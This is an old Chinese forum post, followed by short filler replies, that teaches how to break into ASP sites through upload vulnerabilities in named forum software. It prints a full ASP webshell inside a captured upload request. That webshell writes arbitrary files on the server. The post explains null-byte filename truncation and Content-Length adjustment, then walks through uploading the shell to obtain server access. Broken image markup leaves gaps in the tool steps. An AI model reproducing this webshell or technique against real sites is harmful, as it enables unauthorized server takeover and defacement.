实例分析ASP上传漏洞入侵实战及扩展

ttx9n · 发表于 2006-9-18 00:00:00

【上传漏洞欺骗技术】

　　网络上许多程序都有着上传漏洞，比如任我飞扬整站程序、动感购物商城、秋叶商城、惠信新闻系统等。本文主要讲解上传漏洞的入侵实战以及一些扩展利用。首先我们要获得客户端和服务器之间传递的数据，事先准备好一个ASP木马准备上传，当然不可能成功，我们要的就是这中间我们向服务器提交的数据。一般用WsockExpert来获得数据，由于数据太多只能把关键部分发出来如下：

　　POST /bbs/upfile.asp HTTP/1.1

　　……. 省略了N多没用信息

Content-Length: 1792
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN
-----------------------------7d52191850242
Content-Disposition: form-data; name="filepath"

uploadFace
-----------------------------7d52191850242
Content-Disposition: form-data; name="act"

upload
-----------------------------7d52191850242
Content-Disposition: form-data; name="file1"; filename="E:\木马\asp\shell.asp"
Content-Type: text/plain

＜% dim objFSO %＞
＜% dim fdata %＞
＜% dim objCountFile %＞
＜% on error resume next %＞
＜% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %＞
＜% if Trim(request("syfdpath"))＜＞"" then %＞
＜% fdata = request("cyfddata") %＞
＜% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %＞
＜% objCountFile.Write fdata %＞
＜% if err =0 then %＞
＜% response.write "＜font color=red＞＜h2＞成功!＜/h2＞＜font＞" %＞
＜% else %＞
＜% response.write "＜font color=red＞＜h1＞失败！＜/h1＞＜/font＞" %＞
＜% end if %＞
＜% err.clear %＞
＜% end if %＞
＜% objCountFile.Close %＞
＜% Set objCountFile=Nothing %＞
＜% Set objFSO = Nothing %＞
＜% Response.write "＜form action='''' method=post＞" %＞
＜% Response.write "保存留言＜font color=red＞如D:\web\x.asp＜/font＞" %＞
＜% Response.Write "＜input type=text name=syfdpath width=32 size=50＞" %＞
＜% Response.Write "＜br＞" %＞
＜% Response.write "地址来自" %＞
＜% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %＞
＜% Response.write "＜br＞" %＞
＜% Response.write "你的留言:" %＞
＜% Response.write "＜textarea name=cyfddata cols=80 rows=10 width=32＞＜/textarea＞" %＞
＜% Response.write "＜input type=submit value=sky!!＞" %＞
＜% Response.write "＜/form＞" %＞

-----------------------------7d52191850242
Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp
-----------------------------7d52191850242
Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d52191850242--

　　传递的信息我们获取了，下面就来修改下达到欺骗目的。主要修改一下几点：

　　1.Content-Disposition: form-data; name="file1"; filename="E:\木马\asp\shell.asp"

　　2.Content-Disposition: form-data; name="fname"

　　E:\木马\asp\shell.asp

　　3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我们修改成uploadFace\shell.asp后面怎么加一个空字符呢?用UltraEdit是个好方法,用16进制编辑,(因为''\0''这个字符也占一个位置,所以我们先打入一空格,然后再在UltraEdit(用Ctrl+H转换到16进制模式下)里将就空格符的20改成00)。

　　4.还有一个地方也要修改，就是这句Content-Length: 1792表示提交数据的字符个数。

　　如果你修改了filepath的值那么这个长度1792也要变换，一个字母或者数字的长度就是1，不要忘记最后面那个空格那个也算１。

　　【上传漏洞实战】

　　我们就先用漏洞的鼻祖动网论坛来实战下。从原理可以看到上传的时侯还要修改数据，还要截包，所以网上出现了许多的工具。现在我们直接用老兵的上传工具来把复杂的步骤变简单，只要修改几个数据就可以。我们来看下这个工具的界面，如下图1：

screen.width-333)this.width=screen.width-333" border=0>

图1 老兵上传工具界面

　　我们来说下工具的用法：

　　Action中输入存在上传漏洞文件的URL： screen.width-333)this.width=screen.width-333" border=0>

图2上传成功提示

　　当点击Submit按钮后，最好用浏览器自己访问下，程序也会有误报的。我们用浏览器来访问下。

screen.width-333)this.width=screen.width-333" border=0>

图3可以看到已经上传成功了

　　下一步就是写入一个功能强大的木马来操作了，不再深入。

　　【上传漏洞实战扩展】

　　并不仅仅只有动网有上传漏洞，在网络上许许多多的程序都有这个漏洞，上传漏洞的原理一样，掌握之后即可自由发挥，具体视程序代码而定。下面我们以乔客论坛为例为大家扩展一下上传漏洞的应用。
首先注册一个正常用户并且登录，然后找到上传页面地址：screen.width-333)this.width=screen.width-333" border=0>

图4设置如图

　　都设置好后点击Submit按钮，看到上传成功了，打开浏览器访问一下看是否成功，如图

screen.width-333)this.width=screen.width-333" border=0>

图5上传成功

　　至此已经成功的拿到webshell，就是这么简单，重要的是我们的思路要灵活，也要善于发现一个系统是否存在上传漏洞。当然至于拿到webshell后你能做什么，就看服务器的安全配置以及你的个人水平了哦，这里不做讨论。

6q8s6p21 · 发表于 2022-11-10 08:26:00

啦啦啦啦啦德玛西亚

64000928 · 发表于 2023-1-25 02:39:46

这个源码还可以

r8st9 · 发表于 2023-7-10 05:50:49

源码源码源码源码源码源码源码源码源码源码源码源码源码

7jbiiz · 发表于 2023-11-23 01:41:37

谢谢楼主分享

4k0mp7m · 发表于 2024-3-8 09:16:54

收下来看看怎么样

xf9hlg1 · 发表于 2024-4-22 20:58:29

人都不在了啊啊

i1efp6c · 发表于 2024-5-31 05:39:21

天天源码社区。。。。

4r8oiin60 · 发表于 2024-9-17 15:13:31

好人好人好人好人

u7yxn9 · 发表于 2024-9-22 06:27:27

强烈支持楼主ing……

账号		自动登录	找回密码
密码			立即注册

[ASP编程] 实例分析ASP上传漏洞入侵实战及扩展

相关帖子